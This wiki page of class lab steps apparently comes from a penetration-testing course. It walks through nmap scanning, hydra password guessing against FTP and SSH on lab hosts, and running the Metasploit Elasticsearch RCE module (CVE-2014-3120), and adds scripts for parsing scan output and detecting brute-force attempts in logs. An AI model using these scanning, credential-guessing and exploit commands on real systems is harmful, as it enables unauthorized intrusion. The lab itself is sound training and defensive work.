z- old Labs

Dean Bushmiller edited this page Jun 20, 2024 · 1 revision

Part 1

  • You may do the unsupported local lab
  • You should do the AWS remote lab

Reconnaissance

Recon of website expsec.us

  • Collect social media or public data
  • think of all the ways admins build user logins, and populate the user list on the sheet
  • think of all the ways people make a bad password or reuse a login name, and use them to populate the password list

Part 2

  • You are doing what a tester does.
  • You need to put in 1000 hours of deliberate practice to be a pen tester.
  • This is a walk in the park, not building a park.

Load Kali

Load password list into Kali

Homework: test the lab setup & shut down the machines after testing

Since this is a one-day class, you can do the labs afterwards & email for help

Scan, collect & document: what services are the victims running?

  • Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)
  • Using Metasploit and Nmap together as a scanner
  • IN KALI
  • @ $
  •   bash
  • this is an insecure shortcut for production systems
  •   sudo -i
  • @ root
  •   msfconsole
  • @ msf6>
  •   color true
  •   db_nmap -sS -A 10.0.0.10-21
  •   services
  • Document
  • IN Artifact repository manually (Google Sheet: YOUR copy and paste)
  • Copy output to Vulnerabilities 1 tab (still unconfirmed)
  • https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing
  • Reformat
  • IN KALI
  • @ msf6>
  •   exit
  • !!!done!!!
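The "Document" step above is a manual copy and paste of the `services` table into the sheet. As an added example, not part of the class material, the following Python script parses that fixed-width table into rows and renders them as CSV for the Vulnerabilities 1 tab, tagging each row as unconfirmed. The sample table text is constructed for this example: the hosts, ports, service names and banners in it are made up, not output captured from the lab machines.

```python
import csv
import io
import re

# Constructed sample of the table msfconsole's `services` command prints after
# a db_nmap run. Hosts, ports, service names and banners are made up for this
# example; they are not output captured from the lab machines.
SAMPLE_SERVICES_OUTPUT = """\
Services
========

host       port  proto  name     state  info
----       ----  -----  ----     -----  ----
10.0.0.10  21    tcp    ftp      open   vsftpd 3.0.3
10.0.0.10  22    tcp    ssh      open   OpenSSH 8.4p1 protocol 2.0
10.0.0.21  22    tcp    ssh      open   OpenSSH for_Windows protocol 2.0
10.0.0.21  9200  tcp    wap-wsp  open   Elasticsearch REST API 1.1.1
"""


def parse_services_table(text):
    """Turn the fixed-width `services` table into a list of dicts.

    Column starts are read from the dashed underline beneath the header, so the
    parser does not depend on how many spaces each column was padded with.
    """
    lines = text.splitlines()
    header_idx = None
    for i in range(1, len(lines)):
        stripped = lines[i].strip()
        # The underline is dashes and spaces only and sits right under "host ...".
        if stripped and set(stripped) <= {"-", " "} and lines[i - 1].lstrip().startswith("host"):
            header_idx = i - 1
            break
    if header_idx is None:
        raise ValueError("no services table found in input")

    header, underline = lines[header_idx], lines[header_idx + 1]
    starts = [m.start() for m in re.finditer(r"-+", underline)]
    ends = starts[1:] + [None]          # last column runs to end of line
    names = [header[s:e].strip() for s, e in zip(starts, ends)]

    rows = []
    for line in lines[header_idx + 2:]:
        if not line.strip():
            continue
        fields = [line[s:e].strip() for s, e in zip(starts, ends)]
        rows.append(dict(zip(names, fields)))
    return rows


def services_to_csv(rows, status="unconfirmed"):
    """Render rows as CSV for the Vulnerabilities 1 tab, marking each as unconfirmed."""
    columns = ["host", "port", "proto", "name", "state", "info", "status"]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=columns, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({**{c: row.get(c, "") for c in columns}, "status": status})
    return buf.getvalue()


def open_ports_by_host(rows):
    """Summarise open ports per host, the fact the later target lists are built from."""
    summary = {}
    for row in rows:
        if row.get("state") == "open":
            summary.setdefault(row["host"], []).append(int(row["port"]))
    return summary


if __name__ == "__main__":
    parsed = parse_services_table(SAMPLE_SERVICES_OUTPUT)
    print(services_to_csv(parsed))
    print(open_ports_by_host(parsed))
```

Paste the real `services` output into `SAMPLE_SERVICES_OUTPUT` (or read it from a file) and import the CSV into the sheet; the `status` column keeps the "still unconfirmed" state visible until a finding is verified.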

Upload large password lists & expsec possible user list

  • IN KALI
  • @ root
  •   apt -y install seclists
  •   seclists -h
  • Upload expsec possible user list & custom password list
  • Shortcut: I put a cleaned expsec user list on AWS S3 (building it yourself takes planning & process)
  • Using wget & moving the files into the correct directory
  • IN KALI
  • @ root
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
  •   mv expsecusers.txt /usr/share/seclists/Usernames/
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
  •   mv expsec-passwords.txt /usr/share/seclists/Passwords/
  • !!!done!!!

Password Guessing against 2 targets running FTP & SSH

  • Using hydra
  • From the scan: ports 21 & 22 are open on .10 & .21
  • From seclists we have multiple lists (one real but short, one fake, because the lab can't take 122 hrs)
  • make 2 target lists by echoing data into a file
  • IN KALI
  • @ root
  •   echo '10.0.0.10:21' >> targetsFTP.txt
  •   echo '10.0.0.21:21' >> targetsFTP.txt
  •   echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt
  • verify your file contents
  •   cat targetsFTP.txt
  •   cat targetsSSH.txt
  • verify that you are in /usr/share/seclists (the 2 target files above should be listed there; the hydra paths below are relative to this directory)
  •   ls
  • Use 1 famous list of passwords & a custom list
  • How long does the first take?
  •   hydra -L ./Usernames/expsecusers.txt -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp
  •   hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp
  •   hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh
  • Who do we get?
  • Document
  • IN Artifact repository manually (Google Sheet: your copy and paste)
  • Copy output to Vulnerabilities 1 tab (still unconfirmed)
  • Reformat
  • !!!done!!!
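Seen from the victims' side, a hydra run like the one above leaves a very recognisable trail in the FTP and SSH logs, which is what a blue team keys on. As an added example, not part of the original lab, the following Python script parses constructed sshd (syslog format) and vsftpd (vsftpd.log format) lines and raises two kinds of finding per source and service: many failed logins inside a short window, and a successful login that follows a run of failures (the signal that a guessing run actually found a working credential). The log lines, the thresholds, the window length and the year assumed for syslog timestamps are all assumptions made for this example.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime

# Assumed year for syslog lines, which carry no year of their own.
SYSLOG_YEAR = 2024

# Constructed log lines (not captured from the lab): sshd lines as syslog records
# them and vsftpd lines in vsftpd.log format, for one noisy source (10.0.0.5) and
# one ordinary user who mistypes a password once (10.0.0.77).
SAMPLE_LOG = """\
Jun 20 10:00:01 victim sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 50110 ssh2
Jun 20 10:00:02 victim sshd[2102]: Failed password for invalid user root from 10.0.0.5 port 50111 ssh2
Jun 20 10:00:02 victim sshd[2103]: Failed password for boba_fett from 10.0.0.5 port 50112 ssh2
Jun 20 10:00:03 victim sshd[2104]: Failed password for boba_fett from 10.0.0.5 port 50113 ssh2
Jun 20 10:00:03 victim sshd[2105]: Failed password for boba_fett from 10.0.0.5 port 50114 ssh2
Jun 20 10:00:04 victim sshd[2106]: Accepted password for boba_fett from 10.0.0.5 port 50115 ssh2
Jun 20 10:30:00 victim sshd[2200]: Failed password for alice from 10.0.0.77 port 40001 ssh2
Jun 20 10:30:40 victim sshd[2201]: Accepted password for alice from 10.0.0.77 port 40002 ssh2
Thu Jun 20 10:00:05 2024 [pid 3001] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Jun 20 10:00:05 2024 [pid 3002] [boba_fett] FAIL LOGIN: Client "10.0.0.5"
Thu Jun 20 10:00:06 2024 [pid 3003] [boba_fett] FAIL LOGIN: Client "10.0.0.5"
Thu Jun 20 10:00:06 2024 [pid 3004] [boba_fett] OK LOGIN: Client "10.0.0.5"
"""

Event = namedtuple("Event", "ts service user src success")
Finding = namedtuple("Finding", "src service kind user failures")

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<src>[^"]+)"'
)


def parse_log(text):
    """Normalise sshd and vsftpd lines into Event tuples; unrecognised lines are skipped."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{m['ts']} {SYSLOG_YEAR}", "%b %d %H:%M:%S %Y")
            events.append(Event(ts, "ssh", m["user"], m["src"], m["result"] == "Accepted"))
            continue
        m = VSFTPD_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            events.append(Event(ts, "ftp", m["user"], m["src"], m["result"] == "OK"))
    return events


def detect_guessing(events, threshold=5, window_seconds=60, success_min_failures=3):
    """Flag, per (source, service):
      - "brute-force": at least `threshold` failures inside a sliding window;
      - "success-after-failures": a successful login preceded, within the window,
        by at least `success_min_failures` failures from the same source.
    The second rule is what says a guessing run actually found a credential; the
    minimum keeps a single mistyped password from raising it.
    """
    grouped = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        grouped[(ev.src, ev.service)].append(ev)

    findings = []
    for (src, service), evs in grouped.items():
        recent_failures = []
        reported = False
        for ev in evs:
            # Drop failures that have aged out of the window.
            recent_failures = [f for f in recent_failures
                               if (ev.ts - f.ts).total_seconds() <= window_seconds]
            if ev.success:
                if len(recent_failures) >= success_min_failures:
                    findings.append(Finding(src, service, "success-after-failures",
                                            ev.user, len(recent_failures)))
                continue
            recent_failures.append(ev)
            if not reported and len(recent_failures) >= threshold:
                reported = True   # one brute-force finding per source and service
                findings.append(Finding(src, service, "brute-force", None,
                                        len(recent_failures)))
    return findings


if __name__ == "__main__":
    for finding in detect_guessing(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the constructed input the noisy source is reported for SSH brute force and for the two successful logins that followed its failures, while the user who mistyped once is not reported at all; the thresholds are the knobs a defender tunes against their own baseline.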

Vulnerability search: for the three found

Exploit

  • We have SSH, so we could do anything. But we are not going to.
  • Start an SSH session and escalate privilege.
  • IN KALI
  • @ root
  •   ssh 10.0.0.21 -l boba_fett
  • Supply the password from your Artifact sheet
  •   CTRL Z
  • You now have a remote shell on the Windows victim (it will NOT act like your Kali terminal)
  • What you can do depends on your Microsoft administrator skills.
  • Exploit port 9200
  • IN KALI
  • @ msf6>
  • ? what services have we captured
  •   services
  • ? use exploit (CVE-2014-3120)
  • I am not giving you the settings for set (you must think and apply what you have learned)
  •   use exploit/multi/elasticsearch/script_mvel_rce
  •   set RHOST
  •   set LHOST
  •   set RPORT
  •   set LPORT 4444
  • normally we set PAYLOAD, but we are trying to verify the exploit only
  •   run
  • returned message: Exploit completed, but no session was created.
  • !!!done!!!

Repeat this 300 times and you have a full penetration test.

SHUT DOWN ALL MACHINES IF YOU WANT TO KEEP PAYING AND RESTART THE LAB

DELETE THE CLOUDFORMATION STACK & DELETE THE AMIs TO STOP PAYING